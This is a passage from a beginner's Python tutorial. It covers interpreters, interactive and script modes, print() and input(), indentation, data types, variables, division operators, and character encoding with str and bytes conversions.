CPython uses >>> as the prompt, while IPython uses In [serial number]: as the prompt.
PyPy
PyPy is another Python interpreter that targets execution speed. PyPy uses JIT technology to dynamically compile (note that it does not interpret) Python code, so it can significantly improve the execution speed of Python code.
The vast majority of Python code runs under PyPy, but PyPy and CPython differ in some respects, so the same Python code may produce different results under the two interpreters. If your code is going to run under PyPy, you need to understand those differences.
Jython
Jython is a Python interpreter that runs on the Java platform and can compile Python code directly into Java bytecode for execution.
IronPython
IronPython is similar to Jython, except that IronPython is a Python interpreter that runs on the Microsoft .NET platform.
Summary
There are many interpreters for Python, but the most widely used is CPython. If you want to interact with Java or .NET, Jython and IronPython are the interpreters that target those platforms.
All code in this tutorial is guaranteed to run under CPython version 3.x only. Be sure to install CPython locally (that is, download the installer from the official Python website).
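If you are unsure which interpreter and version you are actually running, the standard library can tell you. The following is a minimal sketch; the variable names are chosen only for illustration.

```python
import platform
import sys

# Name of the interpreter implementation running this script,
# for example "CPython", "PyPy", "Jython" or "IronPython".
implementation = platform.python_implementation()

# Major and minor version of the Python language being run.
major, minor = sys.version_info[:2]

print(implementation, f"{major}.{minor}")
```

On a standard installation from the official Python website, the first word printed should be CPython.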
First Python program
Before we officially write our first Python program, let's review what command line mode and Python interaction mode are.
Command Line Mode
Select "Command Prompt" in the Windows Start menu to enter command line mode, which has a prompt similar to C:\>
.
┌────────────────────────────────────────────────────────┐
│Command Prompt - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> _ │
│ │
│ │
│ │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
Python interactive mode
Type the command python
in command line mode. You will see some text output like the following and then enter Python interactive mode, whose prompt is >>>
.
┌────────────────────────────────────────────────────────┐
│Command Prompt - python - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python │
│Python 3.7 ... on win32 │
│Type "help", ... for more information. │
│>>> _ │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
Typing exit()
and pressing Enter in Python interactive mode exits it and returns you to command line mode:
┌────────────────────────────────────────────────────────┐
│Command Prompt - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python │
│Python 3.7 ... on win32 │
│Type "help", ... for more information. │
│>>> exit() │
│ │
│C:\> _ │
│ │
│ │
└────────────────────────────────────────────────────────┘
You can also select the Python (command line)
menu item from the Start menu to enter Python interactive mode directly, but the window will close as soon as you type exit()
instead of returning to command line mode.
Once we understand how to start and exit Python's interactive mode, we can officially start writing Python code.
Before writing code, a word of advice: never copy and paste code from a web page onto your own computer. Beginners make many mistakes while typing code, such as incorrect spelling, incorrect capitalization, mixing English and Chinese punctuation, and mixing spaces and tabs. Typing the code yourself and checking it carefully is the fastest way to learn how to write programs.
At the interactive mode prompt >>>
, type the code directly and press enter to get the code execution result immediately. Now, try typing 100+200
and see if the calculation results in 300.
>>> 100+200
300
Pretty simple, right? Any valid mathematical calculation will work out.
To get Python to print out the specified text, use the print()
function and then enclose the text you wish to print in single or double quotes, but not a mix of single and double quotes:
>>> print('hello, world')
hello, world
This kind of text enclosed in single or double quotes is called a string in the program, and we will encounter it often in the future.
Finally, exit Python with exit()
and our first Python program is done! The only downside is that it wasn't saved, so you'll have to type the code again the next time you run it.
Command line mode and Python interactive mode
Please note the distinction between command line mode and Python interactive mode.
In command line mode, you can execute python
to enter the Python interactive environment, or you can execute python hello.py
to run a .py
file.
A .py
file can only be run from command line mode. If you type the command python hello.py
and see the following error:
┌────────────────────────────────────────────────────────┐
│Command Prompt _ □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python hello.py │
│python: can't open file 'hello.py': [Errno 2] No such │
│file or directory │
│ │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
The error message No such file or directory
indicates that hello.py
is not found in the current directory. You must first switch the current directory to the directory where hello.py
is located in order to execute properly.
┌────────────────────────────────────────────────────────┐
│Command Prompt _ □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> cd work │
│ │
│C:\work> python hello.py │
│Hello, world! │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
In addition, running a .py
file in command line mode is different from running Python code directly in the Python interactive environment. The interactive environment automatically prints the result of each line of Python code, but running a .py file does not.
For example, in the Python interactive environment, type:
>>> 100 + 200 + 300
600
You can see the result 600
directly.
However, write a calc.py
file with the following content.
100 + 200 + 300
Then, in command line mode, execute.
C:\work>python calc.py
No output appears.
This is normal. To output the result, you must print it yourself with print()
. Change calc.py
to:
print(100 + 200 + 300)
Executing it again, you can see the result.
C:\work>python calc.py
600
Finally, in Python interactive mode, code is typed and executed one line at a time, while in command line mode running a .py
file executes all the code in the file at once. As you can see, Python interactive mode is mainly for debugging Python code and for beginners to learn; it is not an environment for running finished Python programs.
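The difference between the two modes can be reproduced from inside a single script. The sketch below relies on the built-in compile() function: its "single" mode treats the source the way the interactive prompt does, while "exec" mode treats it the way a .py file is treated. The helper name run and the "<demo>" file name are only illustrative.

```python
import contextlib
import io

SOURCE = "100 + 200 + 300\n"

def run(source, mode):
    """Run source in the given compile mode and return what was printed."""
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        exec(compile(source, "<demo>", mode), {})
    return buffer.getvalue()

interactive_output = run(SOURCE, "single")  # like typing at the >>> prompt
script_output = run(SOURCE, "exec")         # like running a .py file

print(repr(interactive_output))
print(repr(script_output))
```

The first call echoes the value of the expression, and the second prints nothing, which is why a script needs an explicit print().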
SyntaxError
If SyntaxError
is encountered, it means that there is a syntax error in the input Python code. The most common type of syntax error is the use of Chinese (full-width) punctuation, such as the full-width brackets （
and ）
.
>>> print（'hello'）
  File "<stdin>", line 1
    print（'hello'）
         ^
SyntaxError: invalid character '（' (U+FF08)
Or the Chinese quotation marks “
and ”
are used.
>>> print(“hello”)
File "<stdin>", line 1
print(“hello”)
^
SyntaxError: invalid character '“' (U+201C)
When an error occurs, be sure to read the cause of the error. For the above SyntaxError
, the interpreter explicitly states that the cause of the error is the unrecognized character “
: invalid character '“'
.
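To see that the full-width brackets really are the problem, you can ask Python to compile a piece of source text without running it. This is a small sketch: the helper is_valid_python and the "<demo>" file name are made up for the example, and the exact wording of the error message depends on the Python version.

```python
BAD_SOURCE = "print（'hello'）"   # full-width brackets (U+FF08 and U+FF09)
GOOD_SOURCE = "print('hello')"   # ordinary ASCII brackets

def is_valid_python(source):
    """Return True if source compiles, False if it raises SyntaxError."""
    try:
        compile(source, "<demo>", "exec")
    except SyntaxError as error:
        print("SyntaxError:", error.msg)
        return False
    return True

print(is_valid_python(BAD_SOURCE))
print(is_valid_python(GOOD_SOURCE))
```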
Summary
In Python interactive mode, you can type code directly, then execute it and get the result immediately.
In command line mode, you can run the .py
file directly.
Using a text editor
The advantage of writing a program on Python's interactive command line is that you get the result immediately, but the disadvantage is that you can't save it, so you have to type it again the next time you want to run it.
So, in practice, we always use a text editor to write the code, and when we're done, we save it as a file so that the program can be run again and again.
Now, let's take the last 'hello, world'
program and write it in a text editor and save it.
So here's the question: which is the best text editor?
Visual Studio Code!
We recommend Visual Studio Code from Microsoft. It is not the full Visual Studio but a lightweight editor, and it is cross-platform: it works on Windows, Mac, and Linux alike.
Please note: do not use Word or Windows Notepad. Word does not save plain text files, and Notepad may add a few special characters (a UTF-8 BOM) at the beginning of the file, which can cause inexplicable errors when running the program.
With the text editor installed, enter the following code.
print('hello, world')
Note that there should not be any spaces in front of print
. Then, select a directory, for example, C:\work
, save the file as hello.py
, and you can open a command line window, switch the current directory to the directory where hello.py
is located, and you can run the program as follows.
C:\work> python hello.py
hello, world
The file can also be saved under another name, such as first.py
, but the name must end with .py
. In addition, the file name should consist only of letters, numbers, and underscores.
If there is no hello.py
file in the current directory, running python hello.py
will report the following error.
C:\Users\IEUser> python hello.py
python: can't open file 'hello.py': [Errno 2] No such file or directory
The error means that the file hello.py
cannot be opened because it does not exist. In this case, you have to check whether the file exists in the current directory. If hello.py
is stored in another directory, you should first switch to that directory with the cd
command.
Inputs and Outputs
Output
Using print()
with a string in parentheses, you can output the specified text to the screen. For example, outputting 'hello, world'
is implemented in code as follows.
>>> print('hello, world')
The print()
function can also accept multiple strings separated by commas; they are printed together on one line.
>>> print('The quick brown fox', 'jumps over', 'the lazy dog')
The quick brown fox jumps over the lazy dog
print()
prints each string in turn and outputs a space wherever a comma separates two arguments, so the pieces are joined into the single line of output shown above.
print()
can also print an integer, or the result of a calculation.
>>> print(300)
300
>>> print(100 + 200)
300
Therefore, we can print the result of calculating 100 + 200
a little more nicely as follows.
>>> print('100 + 200 =', 100 + 200)
100 + 200 = 300
Note that for 100 + 200
, the Python interpreter automatically calculates the result 300
. However, '100 + 200 ='
is a string, not a mathematical expression, so Python prints it as is. Try explaining the printed output above for yourself.
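The space that print() puts between its arguments is only a default. As a brief sketch, the sep keyword argument of print() changes the separator, and joining the strings with ' ' gives the same text that print() writes by default; the variable names are illustrative.

```python
words = ['The quick brown fox', 'jumps over', 'the lazy dog']

# Joining with a single space produces the text print() writes by default.
joined = ' '.join(words)
print(words[0], words[1], words[2])
print(joined)

# sep replaces the default single space between the arguments.
print('100 + 200', 100 + 200, sep=' = ')
```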
Input
Now, you can already output the result you want with print()
. But what if you want the user to type something in? Python provides the input()
function, which lets the user enter a string that can be stored in a variable. For example, to read the user's name:
>>> name = input()
Michael
Once you type name = input()
and hit enter, the Python interactive command line is waiting for your input. At this point, you can type any character you want, then press enter and finish typing.
When you're done, there's no prompt, and the Python interactive command line goes back to >>>
. So where does the content we just typed go? The answer is that it is stored in the name
variable. You can see the contents of the variable by typing name
directly.
>>> name
'Michael'
**What is a variable?** Recall the basics of algebra learned in junior high school mathematics.
Let the side length of a square be a
, then the area of the square is a x a
. Thinking of the side length a
as a variable, we can calculate the area of the square based on the value of a
, e.g.
If a = 2, the area is a x a = 2 x 2 = 4.
If a = 3.5, then the area is a x a = 3.5 x 3.5 = 12.25.
In computer programs, variables can be not only integers or floating point numbers, but also strings, so name
as a variable is a string.
To print out the contents of the name
variable, in addition to writing name
directly and pressing enter, the print()
function can be used.
>>> print(name)
Michael
With input and output, we can change the last program that printed 'hello, world'
to something that makes some sense:
name = input()
print('hello,', name)
Running the above program, the first line of code will ask the user to enter any character as his or her name, which will then be stored in the name
variable; the second line of code will say hello
to the user based on his or her name, for example, enter Michael
.
C:\Workspace> python hello.py
Michael
hello, Michael
But the program runs without any prompt message telling the user: "Hey, hurry up and enter your name", which seems very unfriendly. Fortunately, input()
lets you display a string as a prompt, so we change the code to:
name = input('please enter your name: ')
print('hello,', name)
Run the program again and you will find that as soon as the program runs, it will first print out please enter your name:
so that the user can follow the prompt and enter the name and get the output of hello, xxx
as follows:
C:\Workspace> python hello.py
please enter your name: Michael
hello, Michael
Each time you run the program, the output will be different depending on the user input.
At the command line, input and output are just that simple.
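One way to keep such a program easy to try out is to separate reading the name from building the greeting. The sketch below is an assumption-laden illustration, not part of the original program: ask_name and its read parameter are invented names, and read defaults to the real input() function.

```python
def ask_name(read=input):
    """Prompt for a name and return the greeting text."""
    name = read('please enter your name: ').strip()
    return 'hello, ' + name

# Simulate a user typing "Michael" so the example runs without a keyboard.
# Calling ask_name() with no argument would wait for real input instead.
print(ask_name(read=lambda prompt: 'Michael'))
```

Note that input() always returns a string, even when the user types digits.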
Summary
Every computer program is designed to perform a specific task. With input, the user gives the program the information it needs; with output, the program tells the user the result of the task.
Input and output are collectively referred to as Input/Output, abbreviated as IO.
input()
and print()
are the most basic forms of input and output at the command line, but users can also provide input and receive output through more advanced graphical interfaces, for example by typing a name into a text box on a web page, clicking "OK", and seeing the output on the page.
Python Programming Quick Guide - Syntax
https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832
https://docs.python.org/3/tutorial/index.html
Python Basics
Python is a computer programming language. A programming language differs from the natural languages we use every day. The biggest difference is that natural language can be understood differently in different contexts, whereas a program written in a programming language must never be ambiguous if the computer is to carry out its task. Python is no exception.
Python's syntax is relatively simple and uses indentation, as in the following example.
# print absolute value of an integer:
a = 100
if a >= 0:
    print(a)
else:
    print(-a)
Statements starting with #
are comments, which are for human eyes and can be anything, and are ignored by the interpreter. Every other line is a statement, and when the statement ends with a colon :
, the indented statements that follow are treated as a block of code.
Indentation has advantages and disadvantages. The advantage is that it forces you to write well-formatted code. Python does not prescribe whether an indent is a number of spaces or a tab, but by convention you should always use 4 spaces.
Another advantage of indentation is that it forces you to write less indented code, and you will tend to split a long piece of code into several functions to get less indented code.
The downside of indentation is that "copy-paste" no longer works reliably, which is the worst part. When you refactor your code, pasted code has to be rechecked for correct indentation. In addition, it is hard for an IDE to reformat Python code the way it reformats Java code.
Finally, be sure to note that Python programs are case-sensitive, and if you write the wrong case, the program will report an error.
Summary
Python uses indentation to organize blocks of code, so be sure to follow the convention and stick to a 4-space indent.
In the text editor, you need to set up the automatic conversion of tabs to 4 spaces to make sure you don't mix tabs and spaces.
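Blocks can be nested, and each extra level adds another 4 spaces. As a small sketch, the absolute-value example can be wrapped in a function (the name absolute is chosen only for illustration) to show two levels of indentation:

```python
def absolute(n):
    # Everything indented under "def" belongs to the function body.
    if n >= 0:
        # One level deeper: runs only when the condition is true.
        return n
    else:
        return -n

print(absolute(100))
print(absolute(-100))
```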
Data types and variables
Data types
A computer is, as the name implies, a machine that can do mathematical calculations, so it is logical that computer programs can handle all kinds of numerical values. However, computers can handle much more than just numeric values. They can also handle text, graphics, audio, video, web pages, and a wide variety of other data, and different data requires different data types to be defined. In Python, the data types that can be handled directly are as follows.
integers
Python can handle integers of any size, including negative integers of course, represented in programs exactly as they are written in mathematics, for example: 1
, 100
, -8080
, 0
, and so on.
Since computers use binary, it is sometimes easier to represent integers in hexadecimal, which is represented by the 0x
prefix and 0-9, a-f, for example: 0xff00
, 0xa5b4c3d2
, and so on.
For very large numbers, such as 10000000000
, it is difficult to count the number of zeros. Python allows digits to be separated by _
, so writing 10_000_000_000
is exactly the same as 10000000000
. Hexadecimal numbers can also be written as 0xa1b2_c3d4
.
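A few quick checks confirm that these notations are only different ways of writing the same integers. This is a minimal sketch; the variable name big is illustrative.

```python
big = 10_000_000_000
print(big == 10000000000)          # underscores do not change the value

print(0xff00)                      # a hexadecimal literal, shown in decimal
print(hex(65280))                  # the same number converted back to hex text

print(0xa1b2_c3d4 == 0xa1b2c3d4)   # underscores also work in hexadecimal
```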
floating point numbers
Floating point numbers, also known as decimals, are so called because the position of the decimal point can vary when the number is written in scientific notation; for example, 1.23x10^9 is exactly the same as 12.3x10^8. Floating point numbers can be written in the usual mathematical way, such as 1.23
, 3.14
, -9.01
, and so on. Very large or very small floating point numbers, however, are best written in scientific notation, with 10 replaced by e: 1.23x10^9 is 1.23e9
, or 12.3e8
, 0.000012 can be written as 1.2e-5
, and so on.
Integers and floating point numbers are stored differently inside the computer: integer operations are always exact (is division also exact? Yes!), while floating point operations may have rounding errors.
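The rounding error is easy to observe. The sketch below compares the scientific-notation forms mentioned above and then shows a classic case where a floating point sum is not exactly what you would expect; math.isclose from the standard library is one common way to compare floats with a tolerance.

```python
import math

print(1.23e9 == 12.3e8)        # two spellings of the same number
print(1.2e-5 == 0.000012)

total = 0.1 + 0.2
print(total == 0.3)            # False because of a tiny rounding error
print(math.isclose(total, 0.3))
```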
strings
A string is any text enclosed in single quotes '
or double quotes "
, such as 'abc'
, 'xyz'
, etc. Note that ''
or ""
itself is just a representation, not part of a string, so the string 'abc'
has only the 3 characters a
, b
, c
. If '
itself is also a character, then it can be enclosed in ""
, for example, "I'm OK"
contains the 6 characters I
, '
, m
, space, O
, and K
.
What if the string contains both '
and "
inside? You can use the escape character \
to identify it, for example.
'I\'m \"OK\"!'
The content of the string represented is:
I'm "OK"!
The escape character \
can escape many characters, such as \n
for line feeds, \t
for tabs, and the character \
itself should be escaped, so the character represented by \\
is \
. You can use print()
on Python's interactive command line to print the string to see.
>>> print('I\'m ok.')
I'm ok.
>>> print('I\'m learning\nPython.')
I'm learning
Python.
>>> print('\\\n\\')
\
\
If there are many characters inside the string that need to be escaped, you need to add a lot of \
. For simplicity, Python also allows r''
to indicate that the string inside ''
is not escaped. Try it yourself:
>>> print('\\\t\\')
\ \
>>> print(r'\\\t\\')
\\\t\\
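Counting characters with len() makes the effect of escaping visible. In this short sketch the variable names are illustrative only.

```python
escaped = 'I\'m \"OK\"!'
same_text = "I'm \"OK\"!"
print(escaped == same_text)   # the backslashes are not part of the text
print(len(escaped))

normal = '\\\t\\'             # backslash, tab, backslash
raw = r'\\\t\\'               # every backslash is kept literally
print(len(normal))
print(len(raw))
```

The raw string is longer because none of its backslashes is treated as an escape character.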
If a string contains many newlines, writing it on one line with \n
is hard to read. For simplicity, Python allows the '''...'''
format for multi-line content. Try it yourself:
>>> print('''line1
... line2
... line3''')
line1
line2
line3
The above was typed at the interactive command line. Note that when typing multiple lines, the prompt changes from >>>
to ...
, prompting you to continue the previous line. Note that ...
is a prompt, not part of the code.
┌────────────────────────────────────────────────────────┐
│Command Prompt - python _ □ x │
├────────────────────────────────────────────────────────┤
│>>> print('''line1 │
│... line2 │
│... line3''') │
│line1 │
│line2 │
│line3 │
│ │
│>>> _ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
When the terminator '''
and the closing parenthesis )
have been entered, the statement is executed and the result is printed.
If written as a program and saved as a .py
file, it would be:
print('''line1
line2
line3''')
The multi-line string '''...'''
can also be used with r
in front. Test it yourself:
# -*- coding: utf-8 -*-
print(r'''hello,\n
world''')
Boolean values
Boolean values correspond exactly to those of Boolean algebra. A Boolean is always one of two values: True
or False
. In Python, a Boolean value can be expressed directly as True
, False
(please note the case), or it can be calculated by Boolean operations as follows.
>>> True
True
>>> False
False
>>> 3 > 2
True
>>> 3 > 5
False
Boolean values can be operated on with and
, or
and not
.
The and
operation is logical conjunction: the result of the and
operation is True
only if all are True
.
>>> True and True
True
>>> True and False
False
>>> False and False
False
>>> 5 > 3 and 3 > 1
True
The or
operation is logical disjunction: as long as one of the operands is True
, the result of the or
operation is True
.
>>> True or True
True
>>> True or False
True
>>> False or False
False
>>> 5 > 3 or 1 > 3
True
The not
operation is logical negation; it is a unary operator that turns True
into False
and False
into True
.
>>> not True
False
>>> not False
True
>>> not 1 > 2
True
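The three operators can be summarized in one truth table. The following sketch builds it with itertools.product from the standard library; the list name rows is illustrative. Each row holds a, b, a and b, a or b, and not a.

```python
from itertools import product

rows = []
for a, b in product([True, False], repeat=2):
    rows.append((a, b, a and b, a or b, not a))

for row in rows:
    print(row)

# Comparisons are evaluated before not, so this means not (1 > 2).
print(not 1 > 2)
```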
Boolean values are often used in conditional judgments, e.g.
age = 20  # example value so the snippet runs on its own
if age >= 18:
    print('adult')
else:
    print('teenager')
Null values
A null value is a special value in Python, denoted by None
. None
cannot be interpreted as 0
, because 0
is meaningful, and None
is a special null value.
In addition, Python provides a variety of data types, such as lists and dictionaries, and also allows the creation of custom data types, which we will continue to talk about later.
Variables
The concept of a variable is basically the same as the equation variable in middle school algebra, except that in computer programs, variables can be not only numbers, but also arbitrary data types.
Variables are represented in the program by a variable name, which must be a combination of upper and lower case English letters, digits, and _
, and cannot start with a number, for example.
a = 1
The variable a
is an integer.
t_007 = 'T007'
The variable t_007
is a string.
Answer = True
The variable Answer
is a Boolean value True
.
In Python, the equal sign =
is the assignment operator. It can assign a value of any data type to a variable, and the same variable can be assigned repeatedly, even with values of different types, for example.
# -*- coding: utf-8 -*-
a = 123 # a is an integer
print(a)
a = 'ABC' # a becomes a string
print(a)
A language in which the type of a variable is not fixed is called a dynamic language; its counterpart is a static language. In a static language you must specify the type when defining a variable, and assigning a value of a mismatched type is an error. For example, Java is a static language, and assignment works as follows (// indicates a comment):
int a = 123; // a is an integer type variable
a = "ABC"; // Error: You cannot assign a string to an integer variable
For this reason, dynamic languages are more flexible than static languages.
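In Python you can watch the type change with the built-in type() function. This is a minimal sketch; first_type and second_type are illustrative names.

```python
a = 123
first_type = type(a).__name__    # the type belongs to the value, not the name

a = 'ABC'
second_type = type(a).__name__   # the same name now refers to a string

print(first_type, second_type)
```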
Please don't equate the equal sign of an assignment statement with the equal sign of mathematics. For example, the following code.
x = 10
x = x + 2
If you understand x = x + 2
as a mathematical equation, it can never hold. In a program, the assignment statement first evaluates the expression x + 2
on the right side, gets the result 12
, and then assigns it to the variable x
. Since the previous value of x
was 10
, after reassignment, the value of x
becomes 12
.
Finally, it is also important to understand how variables are represented in computer memory. When we write:
a = 'ABC'
Here the Python interpreter does two things.
- It creates the string 'ABC' in memory.
- It creates a variable named a in memory and points it to 'ABC'.
It is also possible to assign a variable a
to another variable b
, an operation that actually points the variable b
to the data that the variable a
points to, as in the following code.
# -*- coding: utf-8 -*-
a = 'ABC'
b = a
a = 'XYZ'
print(b)
Is the last line printing out the contents of variable b
as 'ABC'
or as 'XYZ'
? If understood in a mathematical sense, one would incorrectly conclude that b
is the same as a
and should also be 'XYZ'
, but in fact, the value of b
is 'ABC'
, so let's execute the code line by line to see what is really happening.
Executing a = 'ABC'
, the interpreter creates the string 'ABC'
and the variable a
, and points a
to 'ABC'
.
Executing b = a
, the interpreter creates the variable b
and points b
to the string 'ABC'
pointed to by a
.
Executing a = 'XYZ'
, the interpreter creates the string 'XYZ'
and changes a
to point to 'XYZ'
, but b
does not change.
So, the final result of printing the variable b
will naturally be 'ABC'
.
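The "pointing" described above can be checked with the is operator, which tests whether two names refer to the very same object. A short sketch, with illustrative variable names:

```python
a = 'ABC'
b = a
same_before = a is b    # both names point to the same string object

a = 'XYZ'               # a now points elsewhere; b is untouched
same_after = a is b

print(same_before, same_after, b)
```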
Constants
A constant is a variable that cannot be changed, for example, the common mathematical constant π is a constant. In Python, constants are usually represented by all-caps variable names.
PI = 3.14159265359
But the fact is that PI
is still a variable, and Python has no mechanism at all to ensure that PI
won't be changed, so using all-caps variable names for constants is just a customary usage, and if you must change the value of the variable PI
, no one can stop you.
Finally, an explanation of why integer division is also exact. In Python, there are two kinds of division, one of which is /
.
>>> 10 / 3
3.3333333333333335
The result of /
division is always a floating point number, even when the two integers divide evenly.
>>> 9 / 3
3.0
Another type of division is //
, called floor division, where the division of two integers remains an integer:
>>> 10 // 3
3
You read that right: the result of integer //
division is always an integer, even when the division is not exact. To do exact division, use /
instead.
Because //
division keeps only the integer part of the result, Python also provides a remainder operation, %, which gives the remainder of dividing two integers.
>>> 10 % 3
1
Whether integers are divided with //
or the remainder is taken, the result is always an integer, so the result of integer arithmetic is always exact.
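Floor division and remainder fit together: the quotient times the divisor plus the remainder gives back the original number. The built-in divmod() returns both at once, as this small sketch shows.

```python
quotient, remainder = divmod(10, 3)   # same as (10 // 3, 10 % 3)
print(quotient, remainder)

# The two results reconstruct the original integer exactly.
print(quotient * 3 + remainder == 10)

# / always gives a float, // on integers gives an int.
print(type(9 / 3).__name__, type(9 // 3).__name__)
```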
Summary
Python supports a variety of data types, and within the computer, any data can be thought of as an "object", and variables are used in programs to point to these data objects.
The assignment x = y
points the variable x
to the real object that the variable y
points to. Subsequent assignments to the variable y
do not affect the pointing of the variable x
.
Note: Python's integers have no size limit, while some languages limit integers according to their storage length; for example, Java limits 32-bit integers to the range -2147483648
to 2147483647
.
Python's floating point numbers do have a finite range; values beyond it are represented as inf
(infinity).
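Both behaviours can be observed directly. In the sketch below, java_int_max is just an illustrative name for the largest 32-bit signed value quoted above, and math.isinf from the standard library tests for infinity.

```python
import math

java_int_max = 2 ** 31 - 1
print(java_int_max)
print(java_int_max + 1)        # Python integers simply keep growing

overflowed = 1e308 * 10        # too large for a floating point number
print(overflowed)
print(math.isinf(overflowed))
```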
String and encoding
Character encoding
As we have already talked about, strings are also a data type, but what is special about strings is that there is also an encoding problem.
Because computers can only process numbers, text must first be converted to numbers before it can be processed. The earliest computers were designed with 8 bits to a byte, so the largest integer that one byte can represent is 255 (binary 11111111 = decimal 255), and representing larger integers requires more bytes. For example, the largest integer that can be represented by two bytes is 65535
and the largest integer that can be represented by four bytes is 4294967295
.
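These limits follow from the number of bits: n bytes hold 8n bits, so the largest unsigned value is 2 to the power 8n, minus 1. A minimal sketch, with max_unsigned as an illustrative helper name:

```python
def max_unsigned(num_bytes):
    """Largest unsigned integer that fits in num_bytes bytes (8 bits each)."""
    return 2 ** (8 * num_bytes) - 1

for n in (1, 2, 4):
    print(n, max_unsigned(n), bin(max_unsigned(n)))
```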
Since the computer was invented by the Americans, only 128 characters (codes 0 to 127) were encoded at first, namely upper and lower case English letters, digits, and some symbols and control codes. This code table is called the ASCII
code; for example, the code for the upper case letter A
is 65
and the code for lower case letter z
is 122
.
But to deal with Chinese, obviously, one byte is not enough, at least two bytes are needed, and it should not conflict with ASCII, so China has developed GB2312
encoding, which is used to encode Chinese.
As you can imagine, there are hundreds of languages in the world. Japan encoded Japanese in Shift_JIS
, Korea encoded Korean in Euc-kr
, and each country has its own standard, so conflicts are inevitable, and text that mixes several languages ends up garbled.
As a result, the Unicode character set was created. Unicode unifies all languages into one set of encodings so that there will be no more problems with garbled code.
The Unicode standard keeps evolving, but the most commonly used form is UTF-16 (historically UCS-2), which uses two bytes to represent most characters (four bytes are needed for very rare characters). Unicode is directly supported by modern operating systems and most programming languages.
Now, to sum up the difference between ASCII and Unicode encoding: ASCII uses 1 byte per character, while Unicode usually uses 2 bytes.
The letter A
is 65
in decimal and 01000001
in binary with ASCII encoding.
The character 0
in ASCII encoding is 48
in decimal and 00110000
in binary, noting that the character '0'
is different from the integer 0
.
The Chinese character 中
is beyond the scope of ASCII encoding and is 20013
in decimal and 01001110 00101101
in binary using Unicode encoding.
You can guess that if you encode the ASCII-encoded A
in Unicode, you just need to pad it with zeros in front, so the Unicode encoding of A
is 00000000 01000001
.
A new problem arises: once everything is unified into Unicode, the garbled-text problem disappears. However, if your text is almost entirely in English, Unicode encoding needs twice as much storage as ASCII encoding, which is wasteful for both storage and transmission.
Therefore, in the interest of economy, the UTF-8
encoding emerged, which converts Unicode into a variable-length encoding
. UTF-8 encodes each character in 1 to 4 bytes depending on its code point: English letters take 1 byte, Chinese characters usually take 3 bytes, and only very rare characters take 4 bytes. If the text you are transferring contains a large number of English characters, using UTF-8 encoding saves space.
Character | ASCII | Unicode | UTF-8 |
---|---|---|---|
A | 01000001 | 00000000 01000001 | 01000001 |
中 | (none) | 01001110 00101101 | 11100100 10111000 10101101 |
From the table above, you can also see that UTF-8 has an added benefit: ASCII encoding can be regarded as a subset of UTF-8, so a large amount of legacy software that only supports ASCII can continue to work with UTF-8.
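The bit patterns in the table can be reproduced with a few lines of Python. In this sketch, bits is a helper written for the example; it formats each byte as eight binary digits. The middle column printed is the 16-bit code point, and the last column is the UTF-8 encoding.

```python
def bits(data):
    """Format a bytes object as space-separated groups of 8 bits."""
    return ' '.join(format(byte, '08b') for byte in data)

for ch in ('A', '中'):
    code_point = format(ord(ch), '016b')   # Unicode code point, 16 bits
    utf8 = bits(ch.encode('utf-8'))        # UTF-8 bytes, 1 to 4 per character
    print(ch, code_point, utf8)
```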
Having figured out the relationship between ASCII, Unicode and UTF-8, we can summarize how character encoding commonly works in computer systems today.
In memory, Unicode is used uniformly; when text needs to be saved to disk or transmitted, it is converted to UTF-8.
When editing with Notepad, UTF-8 characters read from a file are converted to Unicode characters in memory, and when you save, the Unicode is converted back to UTF-8 and written to the file.
When browsing the web, the server converts the dynamically generated Unicode content to UTF-8 before transferring it to the browser.
So you see a lot of web pages with something like <meta charset="UTF-8" />
in their source code, indicating that the page is encoded in UTF-8.
Python's strings
With the headache of character encoding out of the way, let's look at Python strings.
In Python 3, strings are Unicode, meaning that Python's strings support multiple languages, for example:
>>> print('包含中文的str')
包含中文的str
For the encoding of individual characters, Python provides the ord()
function to obtain an integer representation of the character, and the chr()
function to convert the encoding to the corresponding character:
>>> ord('A')
65
>>> ord('中')
20013
>>> chr(66)
'B'
>>> chr(25991)
'文'
If you know the integer encoding of the characters, you can also write str
in hexadecimal like this.
>>> '\u4e2d\u6587'
'中文'
The two ways of writing are exactly equivalent.
Since Python's string type is str, represented in memory as Unicode, one character may correspond to several bytes. To transfer a string over the network or save it to disk, you need to convert the str to bytes.
Python represents data of type bytes
in single or double quotes prefixed with b
as follows.
x = b'ABC'
Be careful to distinguish between 'ABC', which is a str, and b'ABC', which is bytes: although the two display the same content, each character of the bytes value occupies exactly one byte.
The str
in Unicode can be encoded to the specified bytes
by the encode()
method, e.g.
>>> 'ABC'.encode('ascii')
b'ABC'
>>> '中文'.encode('utf-8')
b'\xe4\xb8\xad\xe6\x96\x87'
>>> '中文'.encode('ascii')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-1: ordinal not in range(128)
A str containing only English characters can be encoded as bytes with ASCII, and the content stays the same. A str containing Chinese can be encoded as bytes with UTF-8, but it cannot be encoded with ASCII: Chinese characters fall outside the ASCII range, so Python raises an error.
In bytes
, bytes that cannot be displayed as ASCII characters are displayed with \x##
.
Conversely, if we read a stream of bytes from the network or from a disk, the data read is bytes
. To change bytes
to str
, the decode()
method is used.
>>> b'ABC'.decode('ascii')
'ABC'
>>> b'\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8')
'中文'
If bytes
contains bytes that cannot be decoded, the decode()
method will report an error.
>>> b'\xe4\xb8\xad\xff'.decode('utf-8')
Traceback (most recent call last):
...
